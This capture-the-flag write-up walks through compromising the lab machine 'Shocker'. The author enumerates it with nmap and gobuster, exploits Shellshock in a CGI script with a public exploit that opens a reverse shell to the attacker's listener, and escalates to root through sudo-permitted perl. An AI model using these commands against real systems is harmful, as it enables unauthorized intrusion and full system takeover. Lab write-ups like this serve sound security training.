Shocker is a relatively straightforward box that tasks the user with enumerating with NMAP and Gobuster, as well as using public exploits to compromise the target.

Step 1: Enumerating with NMAP

Our first step is to enumerate with NMAP.

➜  shocker nmap -A -vv 10.129.5.141 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-26 17:34 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:34
Completed Parallel DNS resolution of 1 host. at 17:34, 0.02s elapsed
Initiating Connect Scan at 17:34
Scanning 10.129.5.141 [1000 ports]
Discovered open port 80/tcp on 10.129.5.141
Discovered open port 2222/tcp on 10.129.5.141
Completed Connect Scan at 17:34, 0.50s elapsed (1000 total ports)
Initiating Service scan at 17:34
Scanning 2 services on 10.129.5.141
Completed Service scan at 17:34, 6.07s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.5.141.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.97s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
Nmap scan report for 10.129.5.141
Host is up, received user-set (0.031s latency).
Scanned at 2023-01-26 17:34:46 EST for 8s
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds

We can see that ports 80 (http) and 2222 (ssh) are open. We visited the page at http://10.129.5.141 but didn’t find much. Let’s try running a scan with gobuster to see if there are additional files and directories that we may be able to access.

Step 2: Scanning with Gobuster

We next run a scan with gobuster.

➜  shocker gobuster -w ~/Downloads/SecLists/Discovery/Web-Content/common.txt -u http://10.129.5.141            

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.129.5.141/
[+] Threads      : 10
[+] Wordlist     : /home/exo/Downloads/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2023/01/26 17:39:32 Starting gobuster
=====================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/cgi-bin/ (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
=====================================================
2023/01/26 17:39:47 Finished
=====================================================

We can’t access much of anything, but there is a directory (/cgi-bin/) that may hold additional files. Let’s run an additional scan to dive deeper into the newly found directory.

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.129.5.141/cgi-bin/
[+] Threads      : 10
[+] Wordlist     : /home/exo/Downloads/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : sh,txt
[+] Timeout      : 10s
=====================================================
2023/01/26 17:46:41 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.txt (Status: 403)
/.hta (Status: 403)
/.hta.sh (Status: 403)
/.hta.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.txt (Status: 403)
/user.sh (Status: 200)
=====================================================
2023/01/26 17:47:29 Finished
=====================================================

We search the /cgi-bin/ directory for any files ending in .sh or .txt and find user.sh.

Content-Type: text/plain

Just an uptime test script

 17:47:29 up 22 min,  0 users,  load average: 0.13, 0.05, 0.01

There isn’t much in the file, but it may prove useful later.

Step 3: Exploiting the Shellshock Vulnerability

We searched for quite some time and were unable to find enough information to choose the correct exploit for this box, until we thought about the name of this machine. Shocker, shellshock? Could there be a connection between the name of this box and the popular exploit? Let’s try it out.

We searched Google for shellshock exploit code and quickly found the following page: https://www.exploit-db.com/exploits/34900. It’s a python script that exploits the vulnerablity and provides us with an unprivlieged shell. Let’s run the script and connect to the target machine.

➜  shocker python2.7 shellshock.py payload=reverse rhost=10.129.5.141 lhost=10.10.14.86 lport=4444 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.129.5.141
10.129.5.141> 

We are quickly dropped into a shell. Let’s see what user we are logged in as:

10.129.5.141> whoami
shelly

Great, we can grab the user flag and submit.

Step 4: Escalating Privileges

We now need to escalate privileges. We can run sudo -l to see if we can run any commands as root.

10.129.5.141> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

We can run the perl binary as root. We can check GTFOBins to see if there are any privilege escalation techniques that use the perl binary. We found the following page describing how we can escalate privileges: https://gtfobins.github.io/gtfobins/perl/. We run the following commands:

10.129.5.141> sudo perl -e 'exec "/bin/sh";'
10.129.5.141> whoami
root

We now have root access. The only remaining step is to grab and submit the root flag.